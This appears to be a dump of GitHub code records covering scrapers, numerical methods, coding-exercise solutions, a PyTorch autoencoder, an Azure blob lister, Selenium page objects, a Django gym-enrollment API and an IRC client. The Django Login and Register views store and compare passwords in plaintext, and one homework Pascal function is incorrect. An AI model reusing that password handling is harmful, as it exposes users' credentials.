'DOUBLE_ELIMINATION', 'ROUND_ROBIN', 'SWISS'}\nLADDER_FORMATS = {'MATCHMAKING'}\nUNKNOWN_FORMATS = {'EXHIBITION', 'RACE', 'CUSTOM_SCHEDULE', 'ELIMINATION_ROUND'} # Not tracked\n\n\ndef _find_event_format(event_phases: typing.List[dict]) -> EventFormat:\n bracket_types = set(ph['bracketType'] for ph in event_phases)\n if all(_ in ELIMINATION_FORMATS for _ in bracket_types):\n return EventFormat.ELIMINATION\n if all(_ in LADDER_FORMATS for _ in bracket_types):\n return EventFormat.LADDER\n if all(_ in UNKNOWN_FORMATS for _ in bracket_types):\n return EventFormat.UNKNOWN\n return EventFormat.UNKNOWN # Not sure if technically possible to have a mix?\n\n\ndef _set_data_contains_dq(set_data: dict) -> bool:\n \"\"\" Returns True if set_data contains at least one DQ'd player. \"\"\"\n for entrant in set_data['slots']:\n if entrant['standing']['stats']['score']['value'] is None:\n return True\n if entrant['standing']['stats']['score']['value'] < 0: # DQ = -1:\n return True\n return False\n","repo_name":"odysseycaravels/ranking-scraper","sub_path":"ranking_scraper/smashgg/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":19132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8803833235","text":"#!/usr/bin/python\n\nimport urllib.request\nimport json\n\n\ndef update(pair):\n global asks, bids, lastbid, lastask\n if pair == 0:\n url = \"https://poloniex.com/public?command=returnOrderBook¤cyPair=USDT_BTC&depth=10\"\n elif pair == 1:\n url = \"https://poloniex.com/public?command=returnOrderBook¤cyPair=USDT_LTC&depth=10\"\n elif pair == 2:\n url = \"https://poloniex.com/public?command=returnOrderBook¤cyPair=USDT_ETH&depth=10\"\n elif pair == 3:\n url = \"https://poloniex.com/public?command=returnOrderBook¤cyPair=USDT_BCH&depth=10\"\n request = urllib.request.urlopen(url).read().decode(\"utf-8\")\n data = json.loads(request);\n asks = data[\"asks\"];\n bids = data[\"bids\"];\n lastask = (float(asks[0][0]), asks[0][1])\n lastbid = (float(bids[0][0]), bids[0][1])\n","repo_name":"wesleywilian/pytrade","sub_path":"exchanges/poloniex.py","file_name":"poloniex.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"70839824462","text":"import numpy as np\nimport pandas as pd\n\n\ndef knn(train_set: np.ndarray, test_point: np.ndarray, k: int) -> int:\n closest = np.zeros([k, 2])\n for i, train_point in enumerate(train_set):\n dist_vector = test_point - train_point[:-1]\n\n norm = np.linalg.norm(dist_vector)\n\n if i < k:\n closest[i] = [norm, train_point[-1]]\n\n largest_index = closest[:, 0].argmax()\n if norm < closest[largest_index, 0]:\n closest[largest_index] = [norm, train_point[-1]]\n\n return round(np.average(closest[:, 1]))\n\n\ndef read_file(file: str) -> np.ndarray:\n f = open(file, \"r\")\n file_list = f.readlines()\n array = np.zeros([len(file_list), 3])\n for i, line in enumerate(file_list):\n array[i:] = list(map(float, line.split()))\n return array\n","repo_name":"bxia68/cs-760","sub_path":"hw3/hw3.py","file_name":"hw3.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11367965448","text":"n = int(input())\narr = []\nfor _ in range(n):\n data = input().split()\n arr.append((str(data[0]), int(data[1]), int(data[2]), int(data[3])))\n \narr.sort(key=lambda x: (-x[1], x[2], -x[3], x[0]))\n\nfor i in arr:\n print(i[0])","repo_name":"qwas15788hj/Baekjoon","sub_path":"백준/Silver/10825. 국영수/국영수.py","file_name":"국영수.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35801926695","text":"from doctest import run_docstring_examples\n\ndef pascal(row, column):\n \"\"\"Returns the value of the item in Pascal's Triangle\n whose position is specified by row and column.\n >>> pascal(0, 0) # The top left (the point of the triangle)\n 1\n >>> pascal(0, 5)\t# Empty entry; outside of Pascal's Triangle\n 0\n >>> pascal(3, 2)\t# Row 3 (1 3 3 1), Column 2\n 3\n >>> pascal(4, 2) # Row 4 (1 4 6 4 1), Column 2\n 6\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n pascalNumbers = [1]\n def calculate_pascal(row):\n if column == 0:\n return 1\n elif row == 0:\n return 0\n else:\n return [pascal(row-1, column)] + [pascal(row-1, column-1)]\n pascalNumbers = pascalNumbers + [calculate_pascal(row)]\n return pascalNumbers\n# run_docstring_examples(pascal, globals(), True)\nprint(pascal(2,3))","repo_name":"breadgineer/berkeleyChallenge","sub_path":"cs61a/labs/lab3/Q4.py","file_name":"Q4.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8773543687","text":"import threading\r\nimport time\r\n\r\n# Membuat objek Barrier dengan jumlah thread yang akan dijalankan\r\nbarrier = threading.Barrier(3)\r\n\r\n\r\nclass jalur:\r\n def __init__(self, nama, jenis):\r\n self.nama = nama\r\n self.jenis = jenis\r\n\r\n def jalur_tentu(self):\r\n print(\r\n f\"{self.nama} mulai melakukan pendaftaran pada {time.ctime(time.time())}\")\r\n time.sleep(2)\r\n print(\r\n f\"{self.nama} berhasil melakukan pendaftaran pada {time.ctime(time.time())}\")\r\n # Thread menunggu di barier\r\n barrier.wait()\r\n print(f\"{self.nama} diterima pada jalur {self.jenis}\\n\")\r\n\r\n\r\n# Data jalur\r\njalur1 = jalur(\"Mahasiswa 1\", \"Undangan\")\r\njalur2 = jalur(\"Mahasiswa 2\", \"Reguler\")\r\njalur3 = jalur(\"Mahasiswa 3\", \"Beasiswa\")\r\n\r\nif __name__ == '__main__':\r\n # membuat thread baru untuk setiap jalur\r\n t1 = threading.Thread(target=jalur1.jalur_tentu)\r\n t1.start()\r\n\r\n t2 = threading.Thread(target=jalur2.jalur_tentu)\r\n t2.start()\r\n\r\n t3 = threading.Thread(target=jalur3.jalur_tentu)\r\n t3.start()\r\n\r\n t1.join()\r\n t2.join()\r\n t3.join()\r\n # menampilkan pesan ketika semua jalur pendaftaran ditutup\r\n print(\"Semua jalur pendaftaran ditutup pada jam: \", time.ctime(time.time()))\r\n\r\n start_time = time.time()\r\n end_time = time.time()\r\n print(\"Perbandingan pendaftar dan penerima = \", end_time - start_time)\r\n","repo_name":"kerjabhakti/SISTER_3A","sub_path":"QuisSister/1204011_WildanAzril_QUIS/quis1204011.py","file_name":"quis1204011.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73869260941","text":"import numpy as np\n\ndef swap_rows(v,i,j):\n if len(v.shape) == 1:\n # untuk vektor kolom\n v[i],v[j] = v[j],v[i]\n else:\n v[[i,j],:] = v[[j,i],:]\n\ndef swap_cols(v,i,j):\n v[:,[i,j]] = v[:,[j,i]]\n\n\ndef gauss_elim_pivot( A_, B_, TOL=1.0e-12 ):\n \n N, Nrhs = B_.shape\n\n assert Nrhs == 1\n\n # Bekerja dengan copy agar matriks awal tidak dimodifikasi\n A = np.matrix.copy(A_)\n b = np.matrix.copy(B_[:,0])\n\n # Faktor skala, nilai absolut terbesar perbaris\n s = np.zeros(N)\n for i in range(N):\n s[i] = np.max(np.abs(A[i,:]))\n \n # ubah s menjadi vektor kolom\n s = np.matrix(s).transpose()\n \n for k in range(0,N-1):\n \n # Ganti baris jika diperlukan\n rr = np.abs(A[k:N,k])/s[k:N]\n p = np.argmax(rr) + k\n \n if abs(A[p,k]) < TOL:\n raise RuntimeError(\"Matriks singular\")\n \n if p != k:\n swap_rows(b,k,p)\n swap_rows(s,k,p)\n swap_rows(A,k,p)\n\n # Eliminasi\n for i in range(k+1,N):\n if A[i,k] != 0.0:\n lam = A[i,k]/A[k,k]\n A[i,k+1:N] = A[i,k+1:N] - lam*A[k,k+1:N]\n b[i] = b[i] - lam*b[k]\n\n if abs(A[N-1,N-1]) < TOL:\n raise RuntimeError(\"Matriks singular\")\n \n # Substitusi balik\n b[N-1] = b[N-1]/A[N-1,N-1]\n for k in range(N-2,-1,-1):\n b[k] = (b[k] - np.dot(A[k,k+1:N],b[k+1:N]))/A[k,k]\n \n return b\n\n","repo_name":"f-fathurrahman/ffr-MetodeNumerik","sub_path":"SistemPersLinear/python3/gauss_elim_pivot.py","file_name":"gauss_elim_pivot.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"74025419023","text":"import pytest\n\n\nfrom service.utilities.email import send_email\nfrom pydantic_models.wishlist_game import WishlistGameFull\nfrom config.settings import settings\n\nBARGAIN1 = WishlistGameFull(\n uuid=\"test-uuid\",\n wishlist_uuid=\"test-wishlist-uuid\",\n game_id=\"EP1302-CUSA14370_00-GHOSTOFATALE0000\",\n price_old=25.90,\n price_new=12.95,\n currency=\"CHF\",\n on_sale=True,\n name=\"Ghost of a Tale\",\n shop=\"PlayStation\",\n img_link=\"https://image.api.playstation.com/cdn/EP1302/CUSA14370_00/pz34zcrT5PB1E36hAseLAIu65fF9W4Cd.png\",\n link=\"https://store.playstation.com/de-ch/product/EP1302-CUSA14370_00-GHOSTOFATALE0000\"\n )\n\nBARGAIN2 = WishlistGameFull(\n uuid=\"test-uuid\",\n wishlist_uuid=\"test-wishlist-uuid\",\n game_id=\"EP2333-PPSA01826_00-PATHLESSSIEE0000\",\n price_old=39.90,\n price_new=19.95,\n currency=\"CHF\",\n on_sale=True,\n name=\"The Pathless\",\n shop=\"PlayStation\",\n img_link=\"https://image.api.playstation.com/vulcan/ap/rnd/202007/1500/PzzL4lymRdZuLEerjeL58HG8.png\",\n link=\"https://store.playstation.com/de-ch/product/EP2333-PPSA01826_00-PATHLESSSIEE0000\"\n)\n\nBARGAIN3 = WishlistGameFull(\n uuid=\"test-uuid\",\n wishlist_uuid=\"test-wishlist-uuid\",\n game_id=\"70010000012835\",\n price_old=19.99,\n price_new=9.99,\n currency=\"CHF\",\n on_sale=True,\n name=\"Abzû\",\n shop=\"Nintendo\",\n img_link=\"https://fs-prod-cdn.nintendo-europe.com/media/images/10_share_images/games_15/nintendo_switch_download_software_1/H2x1_NSwitchDS_Abzu_image1600w.jpg\",\n link=\"https://www.nintendo.ch/de/Games/Nintendo-Switch-download-software/ABZU-1467719.html\"\n)\n\n@pytest.mark.manual\n@pytest.mark.skipif(not settings.TEST_RECEIVER_EMAIL, reason=\"No test receiver email set\")\n@pytest.mark.skip(reason=\"Manual test\")\ndef test_send_email():\n bargains = [BARGAIN1,BARGAIN2,BARGAIN3]\n send_email(settings.TEST_RECEIVER_EMAIL,bargains)\n assert True","repo_name":"olilu/the-bargain-hand-be","sub_path":"tests/service_tests/test_email_utilitiy.py","file_name":"test_email_utilitiy.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13246774281","text":"from selenium.webdriver.common.by import By\nfrom main.pages.BasePage import BasePage\nfrom main.pages.SidePanel import SidePanel\n\nDELETE_USER_BUTTON = (By.CSS_SELECTOR, \".btn.btn-link.text-danger\")\nAVAILABLE_ROLE = (By.XPATH, \"//button[@id='dropdownMenuButton']\")\nDELETE_BUTTON = (By.CSS_SELECTOR, \".btn.btn-danger\")\nROLE_DROPDOWN_MENU = (By.XPATH, \"//div[@class='dropdown-menu show']\")\nERROR_TITLE = (By.XPATH, \"//span[@class='jnoty-title']\")\nERROR_MESSAGE = (By.XPATH, \"//div[@class='jnoty-message']\")\n\n\nclass UserRolesProfilePage(SidePanel):\n def __init__(self, driver):\n super().__init__(driver)\n\n def update_user_role(self, name):\n print(\"Select User Role '%s'\" % name)\n self.wait_element_present(AVAILABLE_ROLE).click()\n select = self.wait_element_present(ROLE_DROPDOWN_MENU)\n for option in select.find_elements_by_tag_name('span'):\n if option.text in name:\n option.click()\n break\n self.sleep(10)\n return UserRolesProfilePage(self.driver)\n\n def verify_updated_user_role(self, name):\n print(\"Make sure that current role is '%s'\" % name)\n text = self.wait_element_visible(AVAILABLE_ROLE).text\n print(text)\n is_exists = False\n if name in text:\n is_exists = True\n assert is_exists is True, \"Wrong role is present\"\n return UserRolesProfilePage(self.driver)\n\n def verify_error_message(self, title, message):\n print(\"Make sure that Error title '%s' and message '%s' are present\" % (title, message))\n error_title = self.wait_element_visible(ERROR_TITLE).text\n error_message = self.wait_element_visible(ERROR_MESSAGE).text\n is_exists = False\n if title in error_title and message in error_message:\n is_exists = True\n assert is_exists is True, \"Error message box absent\"\n return UserRolesProfilePage(self.driver)\n\n def delete_user(self):\n print(\"Click on 'Delete user' button to delete user\")\n self.wait_element_present(DELETE_USER_BUTTON).click()\n self.sleep(3)\n self.wait_element_present(DELETE_BUTTON).click()\n self.sleep(5)\n from main.pages.UserRolesPage import UserRolesPage\n return UserRolesPage(self.driver)\n\n","repo_name":"mayadata-io/gui-automation","sub_path":"main/pages/UserRolesProfilePage.py","file_name":"UserRolesProfilePage.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"4668843243","text":"# Author: Werley Cordeiro\r\n# werleycordeiro@gmail.com\r\nimport numpy as np\r\nimport pandas as pd\r\nimport lyapunov\r\nimport Nelson_Siegel_factor_loadings\r\nimport Kfilter\r\nfrom lyapunov import lyapunov\r\nfrom Nelson_Siegel_factor_loadings import Nelson_Siegel_factor_loadings\r\nfrom Kfilter import Kfilter\r\ndef kalman(para,Y,lik,prev,ahead,matu):\r\n lam = para[0];\r\n M = ahead;\r\n if prev:\r\n \tT = Y.shape[0]\r\n \tYf = Y\r\n \tYf.iloc[(T-M):T,] = np.nan\r\n \tY = Y.iloc[1:(T-M),]\r\n \tT = Y.shape[0]\r\n else:\r\n \tT = Y.shape[0]\r\n \tYf = 1\r\n W = Y.shape[1];\r\n N = 3;\r\n mu = np.zeros(N)\r\n phi = np.identity(N)\r\n H = np.identity(W)\r\n Q = np.identity(N)\r\n Z = Nelson_Siegel_factor_loadings(lam=lam,matu=matu)\r\n for i in range(0,W):\r\n \tH[i,i] = np.exp(para[i+1])\r\n H = H.dot(H)\r\n phi[0,0] = para[18]\r\n phi[0,1] = para[19]\r\n phi[0,2] = para[20]\r\n phi[1,0] = para[21]\r\n phi[1,1] = para[22]\r\n phi[1,2] = para[23]\r\n phi[2,0] = para[24]\r\n phi[2,1] = para[25]\r\n phi[2,2] = para[26]\r\n mu[0] = para[27]\r\n mu[1] = para[28]\r\n mu[2] = para[29]\r\n Q[0,0] = para[30]\r\n Q[1,0] = para[31]\r\n Q[1,1] = para[32]\r\n Q[2,0] = para[33]\r\n Q[2,1] = para[34]\r\n Q[2,2] = para[35]\r\n Q = Q.dot(Q.T)\r\n v1 = np.zeros((T,W))\r\n v2 = np.zeros((T,W))\r\n if prev:\r\n \ta_tt = np.zeros(((T+M),N))\r\n \ta_t = np.zeros(((T+M+1),N))\r\n \tP_tt = np.zeros((N,N,(T+M)))\r\n \tP_t = np.zeros((N,N,(T+M+1)))\r\n else:\r\n \ta_tt = np.zeros((T,N))\r\n \ta_t = np.zeros(((T+1),N))\r\n \tP_tt = np.zeros((N,N,T))\r\n \tP_t = np.zeros((N,N,(T+1)))\r\n a_t[0,:] = mu\r\n P_t[:,:,0] = lyapunov(N=N,phi=phi,Q=Q)\r\n logLik =-0.5*T*W*np.log(2*np.pi)\r\n return(Kfilter(logLik=logLik,N=N,T=T,Y=Y,Z=Z,a_t=a_t,P_t=P_t,H=H,a_tt=a_tt,P_tt=P_tt,v2=v2,v1=v1,phi=phi,mu=mu,Q=Q,prev=prev,M=M,Yf=Yf,lik=lik))\r\n","repo_name":"werleycordeiro/Kalman-Filter-Dynamic-Nelson-Siegel","sub_path":"DNS_baseline.py","file_name":"DNS_baseline.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"74715843343","text":"from os import chdir, getcwd, listdir, mkdir, path, remove, rmdir, sep\n\nDATA_DIR = 'data' + sep\nTMP_DIR = 'tmp' + sep\n\nDATA_SET_FILE = DATA_DIR + 'bangumi.csv'\nSKIP_WORD_FILE = DATA_DIR + 'skip_word.txt'\nSTYLE_TRANS_FILE = DATA_DIR + 'style_trans.txt'\n\nPRE_PROCESSED_FILE = TMP_DIR + '.bangumi.npy'\nFAST_TEXT_FILE = TMP_DIR + '.fast.txt'\n\n\ndef get_feature_file(scale):\n return TMP_DIR + '.feature_' + scale + '.npy'\n\n\ndef init():\n full_tmp_dir = getcwd() + sep + TMP_DIR\n\n if not path.exists(full_tmp_dir):\n mkdir(full_tmp_dir)\n\n\ndef clean():\n cur_dir = getcwd()\n chdir(cur_dir + sep + TMP_DIR)\n\n for f in listdir(getcwd()):\n remove(f)\n\n chdir(cur_dir)\n rmdir(TMP_DIR)\n","repo_name":"ljcleo/model_eval","sub_path":"model_eval/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73333805902","text":"class Solution:\n def pacificAtlantic(self, heights: List[List[int]]) -> List[List[int]]:\n def helper(stack: List[Tuple[int, int]], ocean: int) -> None:\n while stack:\n i, j = stack.pop()\n nodes[(i, j)] |= ocean\n for x, y in [(i, j - 1), (i, j + 1), (i - 1, j), (i + 1, j)]:\n if 0 <= x < m and 0 <= y < n:\n if nodes[(x, y)] & ocean != ocean and heights[x][y] >= heights[i][j]:\n stack.append((x, y))\n\n m, n, nodes = len(heights), len(heights[0]), defaultdict(int)\n \n stack = [(0, j) for j in range(n)]\n for i in range(1, m):\n stack.append((i, 0))\n helper(stack, 1)\n \n stack = [(m - 1, j) for j in range(n)]\n for i in range(m - 1):\n stack.append((i, n - 1))\n helper(stack, 2)\n \n return [[i, j] for (i, j), v in nodes.items() if v == 3]\n ","repo_name":"adnanyaqoobvirk/leetcode","sub_path":"417-pacific-atlantic-water-flow/417-pacific-atlantic-water-flow.py","file_name":"417-pacific-atlantic-water-flow.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28065247216","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass AutoEncoder(nn.Module):\n def block(self, nb, inC, outC, ks=5):\n layers = [nn.Conv2d(inC, outC, ks, 1, ks//2), \n nn.ReLU()]\n for _ in range(nb-1):\n layers.append(nn.Conv2d(outC, outC, ks, 1, ks//2))\n layers.append(nn.ReLU())\n\n return nn.Sequential(*layers)\n\n def __init__(self):\n super().__init__()\n self.e1 = self.block(2, 4, 64)\n self.e2 = self.block(2, 64, 128)\n self.e3 = self.block(3, 128, 256)\n self.e4 = self.block(3, 256, 512)\n self.e5 = self.block(3, 512, 512)\n self.e6 = self.block(1, 512, 512, ks=1)\n\n self.d6 = self.block(1, 512, 512, ks=1)\n self.d5 = self.block(1, 512, 512)\n self.d4 = self.block(1, 512, 256)\n self.d3 = self.block(1, 256, 128)\n self.d2 = self.block(1, 128, 64)\n self.d1 = self.block(1, 64, 64)\n self.bottle = nn.Conv2d(64, 1, 5, 1, 2)\n \n def forward(self, input):\n x = self.e1(input)\n x, ind1 = F.max_pool2d(x, 2, 2, return_indices=True)\n x = self.e2(x)\n x, ind2 = F.max_pool2d(x, 2, 2, return_indices=True)\n x = self.e3(x)\n x, ind3 = F.max_pool2d(x, 2, 2, return_indices=True)\n x = self.e4(x)\n x, ind4 = F.max_pool2d(x, 2, 2, return_indices=True)\n x = self.e5(x)\n x, ind5 = F.max_pool2d(x, 2, 2, return_indices=True)\n x = self.e6(x)\n x = self.d6(x)\n x = F.max_unpool2d(x, ind5, 2, stride=2)\n x = self.d5(x)\n x = F.max_unpool2d(x, ind4, 2, stride=2)\n x = self.d4(x)\n x = F.max_unpool2d(x, ind3, 2, stride=2)\n x = self.d3(x)\n x = F.max_unpool2d(x, ind2, 2, stride=2)\n x = self.d2(x)\n x = F.max_unpool2d(x, ind1, 2, stride=2)\n x = self.d1(x)\n x = self.bottle(x)\n\n return x\n\n\nif __name__ == '__main__':\n from torch.autograd import Variable\n from torch.optim import Adam\n # (batch, channel, height, width)\n crit = nn.MSELoss()\n net = AutoEncoder()\n opt = Adam(net.parameters(), lr=1e-3)\n\n for batch in range(5):\n input = torch.rand(2, 4, 64, 64)\n input = Variable(input)\n label = torch.rand(2, 1, 64, 64)\n label = Variable(label)\n\n output = net(input)\n loss = crit(output, label)\n print(loss.data[0])\n\n opt.zero_grad()\n loss.backward()\n opt.step()\n\n\n\n\n","repo_name":"hzhan224/deep-matting","sub_path":"modules/autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"4228360978","text":"import datetime\n\nfrom django.contrib.auth.models import User\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom .models import UserProfile, BatchUser, Batch\n\n\nclass Welcome(APIView):\n @staticmethod\n def get(request):\n return Response({'message': 'I am Alive'}, status.HTTP_200_OK)\n\n\nclass Login(APIView):\n\n @staticmethod\n def getBatchDetails(user):\n active_batches = BatchUser.objects.filter(user=user, active=True)\n for i in active_batches:\n if datetime.date.today() > i.valid_till:\n i.active = False\n i.save()\n active_batches = BatchUser.objects.filter(user=user, active=True)\n if not active_batches:\n return False, {}\n else:\n batch = active_batches[0]\n cur_details = {\n 'name': batch.batch.name,\n 'timings': batch.batch.timings,\n 'started_on': batch.started_on,\n 'days_remaining': (batch.valid_till - datetime.date.today()).days\n }\n return True, cur_details\n\n def post(self, request):\n email = request.data.get('email')\n password = request.data.get('password')\n\n user = UserProfile.objects.filter(username=email)\n if not user or len(user) > 1:\n msg = {'message': 'No user exists'}\n data = {'success': False, 'message': msg}\n return Response(data, status.HTTP_200_OK)\n else:\n user = user[0]\n if user.password != password:\n msg = {'message': 'Incorrect Password'}\n data = {'success': False, 'message': msg}\n return Response(data, status.HTTP_200_OK)\n else:\n present, batch_details = self.getBatchDetails(user)\n data = {\n 'user_id': user.id,\n 'first_name': user.user.first_name,\n 'last_name': user.user.last_name,\n 'age': user.age,\n 'session_active': present,\n 'batch_details': batch_details\n }\n data = {'success': True, 'message': 'Login Successful', 'data': data, }\n return Response(data, status.HTTP_200_OK)\n\n\nclass Register(APIView):\n @staticmethod\n def post(request):\n first_name = request.data.get('first_name')\n last_name = request.data.get('last_name')\n mobile = request.data.get('mobile')\n email = request.data.get('email')\n password = request.data.get('password')\n age = request.data.get('age')\n\n user = UserProfile.objects.filter(username=email)\n if user:\n msg = {'message': 'User already exists'}\n data = {'success': False, 'message': msg}\n return Response(data, status.HTTP_200_OK)\n\n try:\n new_user = User(first_name=first_name, username=email)\n if last_name:\n new_user.last_name = last_name\n new_user.set_password(password)\n new_user.save()\n new_user_profile = UserProfile(user=new_user, mobile=mobile, email=email, age=age, username=email,\n password=password)\n new_user_profile.save()\n msg = {'message': 'User created Successfully'}\n data = {\n 'user_id': new_user_profile.id,\n 'first_name': new_user_profile.user.first_name,\n 'last_name': new_user_profile.user.last_name,\n 'age': new_user_profile.age,\n 'session_active': False,\n 'batch_details': {}\n }\n data = {'success': True, 'message': msg, 'data': data}\n return Response(data, status.HTTP_200_OK)\n\n except Exception as e:\n msg = {'message': 'oops! Some Error Occurred on our side'}\n data = {'success': False, 'message': msg, 'data': {}}\n return Response(data, status.HTTP_200_OK)\n\n\nclass BatchDetails(APIView):\n @staticmethod\n def get(request):\n data = []\n all_batches = Batch.objects.all()\n for i in all_batches:\n cur = {\n 'id': i.id,\n 'name': i.name,\n 'timings': i.timings\n }\n data.append(cur)\n final = {\n 'success': True,\n 'message': '',\n 'data': data\n }\n return Response(final, status.HTTP_200_OK)\n\n\nclass Enroll(APIView):\n\n @staticmethod\n def last_day_of_month(any_day):\n next_month = any_day.replace(day=28) + datetime.timedelta(days=4)\n return next_month - datetime.timedelta(days=next_month.day)\n\n @staticmethod\n def getBatchDetails(user):\n active_batches = BatchUser.objects.filter(user=user, active=True)\n for i in active_batches:\n if datetime.date.today() > i.valid_till:\n i.active = False\n i.save()\n active_batches = BatchUser.objects.filter(user=user, active=True)\n if not active_batches:\n return False, {}\n else:\n batch = active_batches[0]\n cur_details = {\n 'name': batch.batch.name,\n 'timings': batch.batch.timings,\n 'started_on': batch.started_on,\n 'days_remaining': (batch.valid_till - datetime.date.today()).days\n }\n return True, cur_details\n\n def post(self, request):\n user_id = request.data.get('user_id')\n batch_id = request.data.get('batch_id')\n user = UserProfile.objects.filter(id=int(user_id))[0]\n cur_batches = BatchUser.objects.filter(user=user, active=True)\n if cur_batches:\n return Response({\n 'success': False,\n 'message': 'Your batch already exists',\n 'data': {}\n }, status.HTTP_200_OK)\n\n if 18>int(user.age) or 65 List[BlobData]:\n request_uri = self.container_url + '?restype=container&comp=list'\n if (include_snapshots):\n request_uri += '&include=snapshots'\n if (prefix is not None):\n request_uri += '&prefix=' + prefix\n if (max_results is not None):\n request_uri += '&maxresults=' + str(max_results)\n if (sas is not None):\n request_uri += '&' + sas\n print(request_uri)\n resp = requests.get(request_uri)\n if (resp.status_code != 200):\n raise Exception(\"Failed to list blobs. Status code: \" + str(resp.status_code))\n if (not resp.text.startswith(' 1:\n date_time = datetime.strptime(date_posted, '%d/%m/%Y').date()\n else:\n date_time = datetime.today().date()\n print(image)\n print(title)\n print(location)\n print(date_posted)\n print(description)\n print(currency)\n print(number_of_beds)\n\n add = dict(\n image=image,\n title=title,\n location=location,\n date_posted=date_time,\n description=description,\n currency=currency,\n number_of_beds=number_of_beds)\n adds_data.append(add)\n\n is_next_elem_present = UtilsExtractor(response.text).is_next_element_present()\n current_page += 1\n\n return adds_data\n\n\nasync def get_adds():\n adds = await gather_adds()\n return adds\n\n\ndef set_global_db_conn(event):\n global pool\n print(f'PID {os.getpid()} initializing pool.....')\n pool = PooledPostgresqlDatabase('db', user=os.getenv('DB_USER'), password=os.getenv('DB_PASSWORD'),\n host=os.getenv('DB_LOCALHOST'), port=5432, max_connections=100,\n stale_timeout=300)\n event.wait()\n\n\ndef insert_add(add, event):\n with pool as p:\n p.create_tables([database.Add])\n add, created = database.Add.get_or_create(\n image=add['image'],\n title=add['title'],\n location=add['location'],\n date_posted=add['date_posted'],\n description=add['description'],\n currency=add['currency'],\n number_of_beds=add['number_of_beds']\n )\n print(add.id)\n\n\nasync def process_adds():\n adds = await get_adds()\n with Manager() as manager:\n event = manager.Event()\n with Pool(initializer=set_global_db_conn, initargs=[event]) as pool:\n adds_with_event = [(add, event) for add in adds]\n\n result = pool.starmap_async(insert_add, adds_with_event)\n # wait a moment\n # start all issued tasks\n print('Setting event.', flush=True)\n print('Main process blocking...')\n sleep(5)\n event.set()\n # wait for all tasks to finish\n result.wait()\n print('All done.', flush=True)\n\n\nif __name__ == '__main__':\n asyncio.run(process_adds())\n","repo_name":"darynanikk/addsCollectorProject","sub_path":"snippets.py","file_name":"snippets.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29517239428","text":"import sys\nimport os\nimport airc\nimport asyncio\nimport logging\nfrom FriendlyArgumentParser import FriendlyArgumentParser\n\nclass SimpleIRCClient():\n\tdef __init__(self, args):\n\t\tself._args = args\n\t\tself._setup_logging()\n\n\tdef _setup_logging(self):\n\t\tif self._args.verbose == 0:\n\t\t\tloglevel = logging.WARNING\n\t\telif self._args.verbose == 1:\n\t\t\tloglevel = logging.INFO\n\t\telif self._args.verbose == 2:\n\t\t\tloglevel = logging.DEBUG\n\t\telif self._args.verbose == 3:\n\t\t\tloglevel = logging.TRACE\n\t\telse:\n\t\t\tloglevel = logging.EAVESDROP\n\t\tlogging.basicConfig(format = \"{name:>40s} [{levelname:.2s}]: {message}\", style = \"{\", level = loglevel)\n\n\tasync def main(self):\n\t\tirc_server = airc.IRCServer(hostname = self._args.hostname, port = self._args.port, use_tls = self._args.use_tls)\n\t\tirc_servers = [ irc_server ]\n\t\tif len(self._args.nickname) == 0:\n\t\t\tidentities = [ airc.IRCIdentity(nickname = \"x\" + os.urandom(4).hex()) ]\n\t\telse:\n\t\t\tidentities = [ airc.IRCIdentity(nickname = nickname) for nickname in self._args.nickname ]\n\t\tidgen = airc.ListIRCIdentityGenerator(identities)\n\t\tnetwork = airc.IRCNetwork(irc_client_class = airc.client.RawIRCClient, irc_servers = irc_servers, identity_generator = idgen)\n\t\ttask = network.task()\n\t\tawait task\n\nparser = FriendlyArgumentParser(description = \"Simple IRC client.\")\nparser.add_argument(\"-H\", \"--hostname\", metavar = \"hostname\", default = \"irc.freenode.org\", help = \"Specifies hostname to connect to. Defaults to %(default)s.\")\nparser.add_argument(\"-p\", \"--port\", metavar = \"port\", type = int, default = 6666, help = \"Specifies port to connect to. Defaults to %(default)d.\")\nparser.add_argument(\"-s\", \"--use-tls\", action = \"store_true\", help = \"Connect using TLS to the server.\")\nparser.add_argument(\"-n\", \"--nickname\", metavar = \"nick\", action = \"append\", default = [ ], help = \"Nickname(s) to use. Multiple fallbacks can be specified. By default, a randomized nickname is used.\")\nparser.add_argument(\"-v\", \"--verbose\", action = \"count\", default = 0, help = \"Increases verbosity. Can be specified multiple times to increase.\")\nargs = parser.parse_args(sys.argv[1:])\n\nsic = 